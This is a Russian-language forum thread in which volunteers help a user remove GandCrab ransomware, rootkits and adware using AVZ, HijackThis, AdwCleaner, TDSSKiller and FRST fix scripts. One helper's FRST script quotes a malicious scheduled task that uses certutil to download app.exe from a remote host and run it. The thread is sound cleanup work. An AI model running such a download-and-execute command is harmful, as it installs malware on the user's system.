Закрыто Помогите удалить GandCrab.AG

Статус
В этой теме нельзя размещать новые ответы.

Sprng

Новый пользователь
Сообщения
19
Симпатии
1
Баллы
3
#1
Начну с самого начала.
На ночь компьютер не выключал, утром включил и через некоторое время процесс exlplorer.exe завершился сам по себе и антивирус Microsoft Security Essentials уведомил о том что обнаружил какие то файлы/вирусы. Начал смотреть, им оказался Vigorf.A, путь где он находился (C:\Users\Валентин\AppData\Local\Temp\(случайное кол-во цифр)/app.exe. Естественно по этому пути exe никакого не было.
1) Попробовал удалить обнаруженное антивирусом, но спустя некоторое время(мин 20 где то) повторяется все тоже самое завершается explorer.exe антивирус снова обнаруживает тоже самое.
2) Сделал восстановление системы, сразу скажу, что единственная точка восстановления которая была, это на день назад. После перезапуска все тоже самое повторилось что и в п.1, но при этом заметил, что Google Chrome перестал открываться(даже в диспетчере задач процесс не появлялся). Также заметил процесс COM Surrogate в диспетчере задач, сначала подумал что это тот самый вирус, но этот процесс располагался в папке с windows, так что трогать его не стал.
3) Где то на сайте увидел решение этого вируса путем сброса настроек в Internet Explorer, сбросил
Теперь вирус делает все тоже самое что и в п.1 только называется он Ransom:Win32/GandCrab.AG и располагается в file:C:\Users\754C~1\AppData\Local\Temp\614832866\app.exe
file:C:\Users\Валентин\AppData\Local\Temp\135643236\app.exe
754С-1 папки вообще нету

Единственное что вспомнил, откуда мог взяться вирус, пользовался сайтом он помогал понять подходит компьютер под минимальные требования для той или иной игры или нет, для этого нужно было скачать файл который проверял компьютер(тем самым он узнавал видеокарту, процессор и т.п.), но пользовался я этим сайтом уж точно больше года и никогда такого не было.

Единственное что делает вирус, это выключает процесс explorer.exe

Сразу извиняюсь, если много не нужной информации, надеюсь на вашу помощь!
 

Вложения

akok

Команда форума
Администратор
Сообщения
15,481
Симпатии
12,576
Баллы
2,203
#2
Amigo - сами устанавливали?
Hosts сами правили?
True Key Helper - используете, если нет деинсталируйте.
Ваше в доверенной зоне? => O15 - ESC Trusted Zone: https://dvfustud-files.sharepoint.com
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

Код:
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 QuarantineFileF('c:\users\валентин\appdata\roaming\newsi_1\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 ,0);
 QuarantineFile('C:\Users\Валентин\appdata\roaming\newsi_1\s_inst.exe', '');
 QuarantineFile('C:\Users\754C~1\AppData\Roaming\PennyBee\UPDATE~1\UPDATE~1.EXE', '');
 QuarantineFile('C:\Users\754C~1\AppData\Roaming\PennyBee\UPDATE~1\UPDATE~1.EXE','');
 QuarantineFile('C:\Program Files (x86)\QGNA\qGNA.exe','');
 QuarantineFile('C:\Program Files (x86)\Microsoft Data\InstallAddons.exe','');
 DeleteFile('C:\Program Files (x86)\Microsoft Data\InstallAddons.exe','32');
 DeleteFile('C:\Users\754C~1\AppData\Roaming\PennyBee\UPDATE~1\UPDATE~1.EXE','32');
 DeleteFile('C:\Users\754C~1\AppData\Roaming\PennyBee\UPDATE~1\UPDATE~1.EXE');
 DeleteFile('C:\Users\Валентин\appdata\roaming\newsi_1\s_inst.exe', '32');
 DeleteFileMask('c:\users\валентин\appdata\roaming\newsi_1\', '*', true);
 DeleteDirectory('c:\users\валентин\appdata\roaming\newsi_1\');
 ExecuteFile('schtasks.exe', '/delete /TN "BXMKRZW.job" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "OU.job" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "PennyBee.job" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "chrome5" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "chrome5_logon" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "PennyBee" /F', 0, 15000, true);
ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
RebootWindows(true);
end.
Компьютер перезагрузится. После перезагрузки, выполните такой скрипт:

Код:
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.
Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
R0 - HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command: (default) = C:\Program Files (x86)\Internet Explorer\iexplore.exe http://www.delta-homes.com/?type=sc&ts=1402560681&from=wpm0612&uid=WDCXWD5001AALS-00L3B2_WD-WMASY630976009760
O2-32 - HKLM\..\BHO: (no name) - {D5FEC983-01DB-414a-9456-AF95AC9ED7B5} - (no file)
O4 - HKCU\..\Run: [World of Tanks (1)] = C:\Games\World_of_Tanks_CT\WargamingGameUpdater.exe  (file missing)
O4 - HKCU\..\Run: [World of Tanks] = C:\Games\World_of_Tanks\WargamingGameUpdater.exe  (file missing)
O9-32 - Button: HKLM\..\{8DAE90AD-4583-4977-9DD4-4360F7A45C74} - (no name) - (no file)
O22 - Task (Job): BXMKRZW.job - C:\Users\��������\AppData\Roaming\BXMKRZW.exe /infocmdline=UkLka8vZZCrz1Vq+LnIbUPNWkdtTTE9iqQdoVKkZuVWsS9rTgNyDFaflwx7+35Wjso8dbQ1ikvJlqb+EmioyN8v9Y293icDY2Xxd6d/gFslEK4hA0OCdDVrqAUkD64e7VCIq6qCHnFuauqKd6e6Voi09Tn8PT9fkFJt5+SGoa3e4URhPfmP6kDexXBTARMAjeb4JlaBmnMbSasRceWG5cX34fhmWvaZS1yvnDRhm5tJnPylaut+mqLI50o0ThJWu8thUxVXFsQ/6dgam1dN2LGQ/Nk7fcskPWfr11URcv6fEucVw3Up4Kc2m1SApoKsQEQK05UuBWpDgjQDPYYsFtp1aHhLR6emAtbapyDNohXk3qWNCS71iIvUeDNI9J5e/wx10NPHkkv/Bgh5ij7lAtwVHNJ3K0muQeca1HUb1Ax77Y7SwjrmRFgwLGtuAqAgRpP6QlICup7jJbWkjf3Ij2ZqMDP6UhyC3yVnHRrQM1WcN8O0zykWK31Fp8W+JJVPtqA5POcZgiGcz88A0D/owDv2EW28VYmjIYUpcNAfwwBd8A7nOqSIXtDw3Vqe0JeZHQr6Yp/Ves+OqMM8587Ryv2iCkwpevi6rrr9x9A4crcJfU6S+2xTNAyYBSdpWy9qW1vh9vSUNyhCrdLSjq0PfHww9PoW/hIZdMw4hjfXxM70=
O22 - Task (Job): OU.job - C:\Users\��������\AppData\Roaming\OU.exe /infocmdline=I933NiHQ2BH9vOGji7/R4Fp6wDAAhjgd9vmO8AQvXimYeY9KSJDR6qQobOTzLoPo1MW1zEkRqGqXK02teWh5EPhuQyEac8dg5y+EfugR/hSr+CH3bkY8V1i+pTHprL3Tl03PVI4TF3rZK9sclYuQrCurUKpMZIcyriT9RRj1UTF5r+fBfrzVaD+gZbOexPvCtPkskTrx6cofVvHjMXuH7IwMCEx3zYPgsWQCKCj95M70xlVrNalLmgPAvDEAGXDSYwvewn1Fl3bo5VhT1qnjT1UKU7Bymvsks3EGIbccepqm9DV1fKJznTNeV1r9b/271ZYifw9JvgG++/ttOpFtPqlF7f/vjsLtnf4/1cEyhGOYgce0ULASeXQz7aER146bdCsWzlmoYN8YFXl3KzHnZ3dBrerpGB7hnIXfkco+HlseP39n27ZsoQors2BBqokHCr1XeVqwQAiG0hfhIhhlJoQ+S6qcl5zh66zaCeVkQZOb30Oz1HP9sHPRG7Vebi9j
O22 - Task (Job): PennyBee.job - C:\Users\Валентин\AppData\Roaming\PennyBee\UpdateProc\UPDATE~1.EXE /Check
O22 - Task: PennyBee - C:\Users\754C~1\AppData\Roaming\PennyBee\UPDATE~1\UPDATE~1.EXE /Check (file missing)
O22 - Task: chrome5 - C:\Program Files (x86)\Microsoft Data\InstallAddons.exe /reinstall=1 /opid=wuid-7a66484d-c195-e14e-950a-890a49af5f41 /ffid=exsuper@ip-walk.net /partner=3010 /scheme=im3
O22 - Task: chrome5_logon - C:\Program Files (x86)\Microsoft Data\InstallAddons.exe /reinstall=1 /opid=wuid-7a66484d-c195-e14e-950a-890a49af5f41 /ffid=exsuper@ip-walk.net /partner=3010 /scheme=im3
  • Скачайте AdwCleaner и сохраните его на Рабочем столе.
  • Запустите его (в ОС Vista/Windows 7, 8, 8.1, 10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[S0].txt.
  • Прикрепите отчет к своему следующему сообщению.

Подробнее читайте в этом руководстве.
 

Sprng

Новый пользователь
Сообщения
19
Симпатии
1
Баллы
3
#3
Спасибо за ответ. Буквально минут 10 назад прогнался KVRT(Kaspersky Virus Removal Tool ) обнаружил еще несколько вирусов и им же их попробовал почистить. После этого антивирус ничего не обнаружвает, процесс explorer не выключается. Также перезагрузился и все пока нормально.

Стоит ли все равно делать то, что вы написали выше?(так скажем для профилактики). Если все же ответ будет да, то отвечу на вопросы:
1. Amigo сам точно не устанавливал, и сейчас его на компьютере нет
2. Hosts правил сам
3. https://dvfustud-files.sharepoint.com - да это мое в доверенной зоне.
 

akok

Команда форума
Администратор
Сообщения
15,481
Симпатии
12,576
Баллы
2,203
#4
Стоит, возможно остались следы.
 

akok

Команда форума
Администратор
Сообщения
15,481
Симпатии
12,576
Баллы
2,203
#5
Судя по найденным адваре, все пришлось с какой-то устанавливаемой программой.
 

akok

Команда форума
Администратор
Сообщения
15,481
Симпатии
12,576
Баллы
2,203
#7
Как видите, не все удалено.

Если пользуетесь mail.ru, то не удаляйте соответствующие записи.
  • Запустите повторно AdwCleaner (в ОС Vista/Windows 7/8 необходимо запускать через правую кн. мыши от имени администратора).
  • В меню Настройки отметьте:
    • Сброс политик IE
    • Сброс политик Chrome
  • Нажмите кнопку "Scan" ("Сканировать"), а по окончанию сканирования нажмите кнопку "Cleaning" ("Очистка") и дождитесь окончания удаления.
  • Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[C0].txt.
  • Прикрепите отчет к своему следующему сообщению
Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

Подробнее читайте в этом руководстве.

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

Sprng

Новый пользователь
Сообщения
19
Симпатии
1
Баллы
3
#8
Сначала вроде даже показалось что компьютер стал быстрее включаться. Но как включил антивирус Майкрософта, опять нашлись вирусы.
file:C:\Users\Валентин\AppData\Local\Temp\csrss\cloudnet.exe
и
file:C:\Windows\rss\csrss.exe
 

Вложения

akok

Команда форума
Администратор
Сообщения
15,481
Симпатии
12,576
Баллы
2,203
#9
  1. Скачайте архив TDSSKiller.zip и распакуйте его в отдельную папку;
  2. Запустите файл TDSSKiller.exe.
  3. Нажмите кнопку "Начать проверку". Не меняйте настройки сканирования по умолчанию.
  4. В процессе проверки могут быть обнаружены объекты двух типов:
    • вредоносные (точно было установлено, какой вредоносной программой поражен объект);
    • подозрительные (тип вредоносного воздействия точно установить невозможно).
  5. По окончании проверки утилита выводит список обнаруженных объектов с их подробным описанием.
  6. Для вредоносных объектов утилита автоматически определяет действие: Лечить или Удалить.
  7. Для подозрительных объектов утилита предоставляет выбор действия пользователю (по умолчанию Пропустить).
  8. Самостоятельно без указания консультанта ничего не удаляйте!!!
  9. После нажатия кнопки Продолжить утилита выполняет выбранные действия и выводит результат.
  10. Прикрепите лог утилиты к своему следующему сообщению
По умолчанию утилита выводит отчет работы в корень системного диска (диска, на котором установлена операционная система, как правило, это диск С:\).
Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txt
Например, C:\TDSSKiller.3.0.0.44_10.05.2015_13.39.01_log.txt
 

Sprng

Новый пользователь
Сообщения
19
Симпатии
1
Баллы
3
#10
Почему то два лога появилось, один после перезагрузки. На всякий случай скину два.
 

Вложения

akok

Команда форума
Администратор
Сообщения
15,481
Симпатии
12,576
Баллы
2,203
#11
VirtualBox - установлен? Если да, то возможно потребуется переустановка после лечения.

Повторите сканирование TDSSKiller и удалите все найденное у вас комплект руткитов живет.

После
  1. Найдите в корне системного диска (обычно это диск C:) папку TDSSkiller_Quarantine.
  2. Заархивруйте эту папку с паролем virus. И отправьте полученный архив на адрес quarantine<at>safezone.cc (at=@), в заголовке (теме) письма укажите ссылку на тему, где Вам оказывается помощь.

После подготовьте свежий лог Farbar Recovery Scan Tool
 

akok

Команда форума
Администратор
Сообщения
15,481
Симпатии
12,576
Баллы
2,203
#13
Тогда ждем лог frst
 

regist

гоняюсь за туманом
Ассоциация VN/VIP
VIP
Разработчик
Сообщения
12,229
Симпатии
5,834
Баллы
918
#14
+
  1. Найдите в корне системного диска (обычно это диск C:) папку TDSSkiller_Quarantine.
  2. Заархивруйте эту папку с паролем virus. И отправьте полученный архив на адрес quarantine<at>safezone.cc (at=@), в заголовке (теме) письма укажите ссылку на тему, где Вам оказывается помощь.
 

Sprng

Новый пользователь
Сообщения
19
Симпатии
1
Баллы
3
#16
+
  1. Найдите в корне системного диска (обычно это диск C:) папку TDSSkiller_Quarantine.
  2. Заархивруйте эту папку с паролем virus. И отправьте полученный архив на адрес quarantine<at>safezone.cc (at=@), в заголовке (теме) письма укажите ссылку на тему, где Вам оказывается помощь.
Так сделал уже и отправил.
 

Sprng

Новый пользователь
Сообщения
19
Симпатии
1
Баллы
3
#18
Забыл совсем про это, извиняюсь.
Сообщения объединены:

Прямо сейчас выключился процесс explorer.exe и антивирус показывает все тот же GandCrab.AG
 

Вложения

Последнее редактирование:

akok

Команда форума
Администратор
Сообщения
15,481
Симпатии
12,576
Баллы
2,203
#19
Снять руткит, это еще не вылечить систему
Деинсталируйте
Optimizer Pro
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    VirusTotal: C:\Program Files\Bonjour\mDNSResponder.exe;C:\Program Files (x86)\Download Master\dmaster.exe;C:\Windows\System32\DRIVERS\oem-drv64.sys; C:\Windows\system32\Drivers\vaczaalf.sys
    HKLM-x32\...\RunOnce: [{25AE5619-456B-4DE9-94E1-987EE1B7D2FB}] => cmd.exe /C start /D "C:\Users\754C~1\AppData\Local\Temp\{25AE5619-456B-4DE9-94E1-987EE1B7D2FB}" /B {F34B27D6-2440-4F0B-87D8-E80C6B08992A}.exe -accepteula -accepteulaksn -postboot <==== ATTENTION
    HKU\S-1-5-21-3291714482-855320212-3275224420-1000\...\Run: [amigo] => [X] <==== ATTENTION
    HKU\S-1-5-21-3291714482-855320212-3275224420-1000\...\MountPoints2: H - H:\HTC_Sync_Manager_PC.exe
    HKU\S-1-5-21-3291714482-855320212-3275224420-1000\...\MountPoints2: {3a858d60-02fa-11e7-86ef-c86000df5edc} - E:\Launch.exe
    HKU\S-1-5-21-3291714482-855320212-3275224420-1000\...\MountPoints2: {43f21e80-2591-11e4-9867-c86000df5edc} - G:\Setup.exe
    HKU\S-1-5-21-3291714482-855320212-3275224420-1000\...\MountPoints2: {49867e02-17ad-11e5-b514-c86000df5edc} - F:\AutoRun.exe
    HKU\S-1-5-21-3291714482-855320212-3275224420-1000\...\MountPoints2: {59cb8511-00b5-11e4-aeae-c86000df5edc} - E:\Setup.exe
    HKU\S-1-5-21-3291714482-855320212-3275224420-1000\...\MountPoints2: {6f086cbf-d248-11e3-aef6-c86000df5edc} - F:\Setup.EXE
    HKU\S-1-5-21-3291714482-855320212-3275224420-1000\...\MountPoints2: {6f086cc1-d248-11e3-aef6-c86000df5edc} - G:\.autorun\autorun.exe
    HKU\S-1-5-21-3291714482-855320212-3275224420-1000\...\MountPoints2: {7c562439-7c41-11e4-a1f4-c86000df5edc} - H:\HTC_Sync_Manager_PC.exe
    HKU\S-1-5-21-3291714482-855320212-3275224420-1000\...\MountPoints2: {86f4b5d6-e2c9-11e5-97d2-c86000df5edc} - F:\setup.exe
    HKU\S-1-5-21-3291714482-855320212-3275224420-1000\...\MountPoints2: {8e02e0e6-c6ee-11e7-aebc-c86000df5edc} - F:\AutoRun.exe
    HKU\S-1-5-21-3291714482-855320212-3275224420-1000\...\MountPoints2: {94ae3c90-b79a-11e3-9b93-c86000df5edc} - G:\Startme.exe
    HKU\S-1-5-21-3291714482-855320212-3275224420-1000\...\MountPoints2: {b31db864-160c-11e5-816f-c86000df5edc} - F:\AutoRun.exe
    HKU\S-1-5-21-3291714482-855320212-3275224420-1000\...\MountPoints2: {b31db875-160c-11e5-816f-c86000df5edc} - F:\AutoRun.exe
    HKU\S-1-5-21-3291714482-855320212-3275224420-1000\...\MountPoints2: {ea9e8189-d3e3-11e3-abbe-c86000df5edc} - E:\setup.exe
    HKU\S-1-5-21-3291714482-855320212-3275224420-1000\...\MountPoints2: {ef5451e3-fd02-11e4-ae87-c86000df5edc} - F:\HTC_Sync_Manager_PC.exe
    HKU\S-1-5-21-3291714482-855320212-3275224420-1000\...\MountPoints2: {f48ba31b-1bc4-11e5-8241-c86000df5edc} - F:\AutoRun.exe
    HKU\S-1-5-21-3291714482-855320212-3275224420-1000\...\MountPoints2: {ff30ec61-19c7-11e4-abc2-c86000df5edc} - F:\Setup.exe
    HKU\S-1-5-21-3291714482-855320212-3275224420-1000\...\MountPoints2: {ffc625b3-e532-11e3-aee7-c86000df5edc} - H:\Setup.EXE
    GroupPolicy: Restriction ? <==== ATTENTION
    GroupPolicy\User: Restriction ? <==== ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
    CHR HKU\S-1-5-21-3291714482-855320212-3275224420-1000\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = 
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = 
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
    SearchScopes: HKLM -> DefaultScope value is missing
    SearchScopes: HKLM-x32 -> DefaultScope value is missing
    SearchScopes: HKU\.DEFAULT -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = 
    S2 wbiosrvp; C:\Windows\System32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
    S2 wbiosrvp; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
    S2 51cdb72; "C:\Windows\system32\rundll32.exe" "c:\Program Files (x86)\Optimizer Pro 3.11\OptProCrash.dll",ENT
    S3 VBoxDrv; C:\Windows\system32\drivers\VBoxDrv.sys [68288 2018-05-11] () [File not signed]
    S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [X]
    Task: {EF155C7C-361C-41A1-AFA7-DCBBD89673CF} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://newscommer.com/app/app.exe C:\Users\Валентин\AppData\Local\Temp\csrss\scheduled.exe && 
    C:\Users\Валентин\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
    C:\Users\Валентин\AppData\Local\Temp\csrss
    AlternateDataStreams: C:\Windows\system32\Drivers\vaczaalf.sys:changelist [878]
    AlternateDataStreams: C:\ProgramData\TEMP:A1EDB939 [132]
    AlternateDataStreams: C:\Users\Валентин\Local Settings:wa [178]
    AlternateDataStreams: C:\Users\Валентин\AppData\Local:wa [178]
    AlternateDataStreams: C:\Users\Валентин\AppData\Local\Application Data:wa [178]
    AlternateDataStreams: C:\Users\Валентин\AppData\Local\Temp:$DATA [16]
    AlternateDataStreams: C:\Users\Все пользователи\TEMP:A1EDB939 [132]
    FirewallRules: [{061CCE9E-CF23-4BA9-9B72-683B7C11683C}] => (Allow) C:\Windows\rss\
    FirewallRules: [{061CCE9E-CF23-4BA9-9B72-683B7C11683C}] => (Allow) C:\Windows\rss\csrss.exe
    C:\Windows\rss\csrss.exe
    C:\Windows\rss\csrss.exe
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

Порты сами открывали?
FirewallRules: [{E23CAD7C-B650-4684-9443-A65DBDC2879F}] => (Allow) LPort=80
FirewallRules: [{B30E57E4-644A-41E9-B6F2-9258016503B3}] => (Allow) LPort=443
FirewallRules: [{7518C277-8D0B-4E61-9565-AB5D7E671581}] => (Allow) LPort=20010
FirewallRules: [{37561BA6-1D69-4633-89F2-6CD39A1F7C13}] => (Allow) LPort=3478
FirewallRules: [{785C1430-E233-4107-B5CE-A29142EB6449}] => (Allow) LPort=7850
FirewallRules: [{27385BFE-7375-43B4-A615-C3858663822F}] => (Allow) LPort=27022
FirewallRules: [{2B60750B-0C18-4545-9998-441B11BB4BB8}] => (Allow) LPort=6881
FirewallRules: [{594CFDA3-2C2F-44B0-81AB-65A5924BC24F}] => (Allow) LPort=33333
FirewallRules: [{1E5800C8-82CC-479D-A0DA-F7D4E2B48862}] => (Allow) LPort=20443
FirewallRules: [{D0C057EF-73AA-4BE1-9A5B-6EB9A49C1AE9}] => (Allow) LPort=8090
 
/div>

Sprng

Новый пользователь
Сообщения
19
Симпатии
1
Баллы
3
#20
Optimizer Pro так и не смог найти на компьютере. Насчет портов не могу сказать точно(просто потому что не помню). Были мысли их открыть для какой то игры, но вроде так и не сделал.
 

Вложения

Статус
В этой теме нельзя размещать новые ответы.
Сверху Снизу